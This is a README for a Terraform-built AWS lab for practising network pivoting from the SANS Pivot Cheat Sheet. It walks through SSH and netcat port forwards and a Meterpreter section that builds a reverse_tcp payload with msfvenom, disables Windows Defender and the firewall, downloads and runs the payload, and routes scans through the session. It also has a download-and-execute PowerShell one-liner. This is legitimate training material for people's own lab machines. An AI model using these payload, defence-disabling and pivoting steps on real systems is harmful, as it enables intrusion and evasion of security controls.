Terraform project to build AWS instances for pivot practice
SANS Pivot Cheat Sheet Lab
This serves as a tool for cybersecurity enthusiasts to better understand pivoting through an environment. The central reference is the SANS Pivot Cheat Sheet. Some code used from Terraform's HashiCorp Learn platform. There's also a free SANS webcast using this repo and covering the cheat sheet. Enjoy!
- AWS IAM Credentials to interact with an AWS account
- AWS CLI installed
- Terraform installed
- This file explains the repository
- Overall architecture of the Terraform project
- Contains values used in production
- Defines outputs requested from the build
- scripts/: YAML config files for instances
- assets/: Files copied to instances
Setup Steps
Create Keys and Apply to YAML Configs
ssh-keygen -t rsa -C "[email protected]" -f ../tf-cloud-init
- Look for
in the YAML files inscripts/
. Replace the example public keys with the contents of your
. One-liner:-
sed -i "s:ssh-rsa.*$:$(cat ../|tr -d '\n'):" ./scripts/*yaml
Set Default AWS Credentials
- Check to see what you have in your
cat ~/.aws/credentials
- Set your current shell to use the right set:
export AWS_PROFILE=Your-Favorite-IAM
Create the Range with Terraform
$ terraform init
Terraform has been successfully initialized!
$ terraform fmt
$ terraform validate
Success! The configuration is valid.
$ terraform apply
Do you want to perform these actions?
Terraform will perform the actions described above.
Only 'yes' will be accepted to approve.
Enter a value: yes
Apply complete! Resources: 11 added, 0 changed, 0 destroyed.
linux_attack_private_ip = ""
linux_attack_public_ip = ""
linux_pivot_private_ip = ""
linux_pivot_public_ip = ""
linux_target_private_ip = ""
linux_target_public_ip = ""
sg_pivot = "sg-0123456789abcdef0"
vpc = "vpc-0123456789abcdef0"
$ terraform show #optional - to show assets and addresses again
Optionally: Create a Windows Instance as Another Pivot
- From the AWS Console, Launch Instances
- Name it Windows-Pivot
- Optional: add a tag like "Project:PivotPlay"
- Pick a Windows AMI - maybe Server 2022 (ami-0b9fc4f4583318dff)
- Next, then t2micro is probably OK
- Create a new key and save them; I'll call mine pivot-labz
- Next, then VPC from the Terraform output
- Set Auto-Assign public IP to Enable
- Pick the sg_pivot security group
- Under Advanced network configuration, set Primary IP addresses to
- Review, then Launch instance
- Once the new instance is up, select it in the Instances view and Connect using the key you just created to get the password
- Optionally, you can do this with the AWS CLI:
aws ec2 create-key-pair --key-name pivot-labz --region us-east-2
- Save the private key to something like
so you can get the instance password later -
aws ec2 describe-subnets --region us-east-2
# to get the subnet-id for the next command -
aws ec2 run-instances --image-id ami-0b9fc4f4583318dff --count 1 --instance-type t2.micro --key-name pivot-labz --security-group-ids sg-0123456789abcdef0 --subnet-id subnet-6e7f829e --region us-east-2
- Noting the instance-id created, get the password with
aws ec2 get-password-data --instance-id i-0123456789abcdef0 --priv-launch-key ../pivot-labz.pem --region us-east-2
- Then RDP in!
, connect as Administrator with your random password.
Optional Windows Steps
- Install chocolatey package manager:
Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString(''))
- Install Nmap or other tools:
choco install nmap
- Update the hosts file:
notepad.exe C:\Windows\System32\drivers\etc\hosts linux-attack linux-pivot windows-pivot linux-target
Connect to the Attack Machine with the IP from the Terraform Output
ssh attack@AttackIPHere -i ../tf-cloud-init
- If you've lost track of those IPs, just
terraform show
to see them again
Confirm You Can't Get to the Target
- attack $
ornmap linux-pivot linux-target
- attack $
curl linux-pivot
# succeeds! - attack $
curl linux-target
# fails )-:
Local Port Forward
scp -i ../tf-cloud-init ../tf-cloud-init attack@AttackIPHere:~/.ssh
# copy private key to the attack host -
ssh -i ../tf-cloud-init attack@AttackIPHere
# connect to the attack host - attack $
ssh -i .ssh/tf-cloud-init pivot@linux-pivot
# verify you have access the the pivot host - pivot $
- attack $
ssh -i .ssh/tf-cloud-init -fNL 1337:linux-target:80 pivot@linux-pivot
- attack $
curl localhost:1337
# success!
Dynamic Port Forward
- attack $
ssh -i .ssh/tf-cloud-init -D 9050 -fN pivot@linux-pivot
- attack $
proxychains curl linux-target
# success!
Netcat Port Forward
- attack $
- attack $ <Ctrl>b "
- attack $
ssh -i .ssh/tf-cloud-init pivot@linux-pivot
- pivot $
mkfifo backpipe
- pivot $
nc -lvp 2000 0<backpipe | nc linux-target 80 >backpipe
- attack $ <Ctrl>b <Up arrow>
- attack $
curl linux-pivot:2000
# success!
Roll Meterpreter on Windows
- attack $
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=eth0 LPORT=8888 -f exe -o helper.exe
# create a payload - attack $
python3 -m http.server 8000
# serve it up; <Ctrl>-c later to end - pivot PS>
Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
# disable Defender - pivot PS>
netsh advfirewall set allprofiles state off
# disable the host firewall - pivot PS>
curl -OutFile helper.exe
# grab the malware - Build a resource file on attack $
cat << EOF > catch8888.rc
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST eth0
set LPORT 8888
- attack $
msfconsole -r catch8888.rc
# start up Metasploit to catch the payload - pivot PS>
# exploit yourself!
- meterpreter >
[*] Backgrounding session 1...
- msf6 >
use post/multi/manage/autoroute
- msf6 post(multi/manage/autoroute) >
set subnet
- msf6 post(multi/manage/autoroute) >
set session 1
# or whatever your Meterpreter session number is - msf6 post(multi/manage/autoroute) >
- msf6 post(multi/manage/autoroute) >
use auxiliary/scanner/portscan/tcp
# and now to check that it works! - msf6 auxiliary(scanner/portscan/tcp) >
set RHOSTS linux-target
- msf6 auxiliary(scanner/portscan/tcp) >
set PORTS 80
- msf6 auxiliary(scanner/portscan/tcp) >
[+] - - TCP OPEN # success!
Tear Down Steps
- Go into AWS EC2, switch to the correct region, and terminate any Windows instances.
$ terraform destroy
Do you really want to destroy all resources?
Terraform will destroy all your managed infrastructure, as shown above.
There is no undo. Only 'yes' will be accepted to confirm.
Enter a value: yes
Destroy complete! Resources: 11 destroyed.
$ terraform show #optional - to show assets and addresses again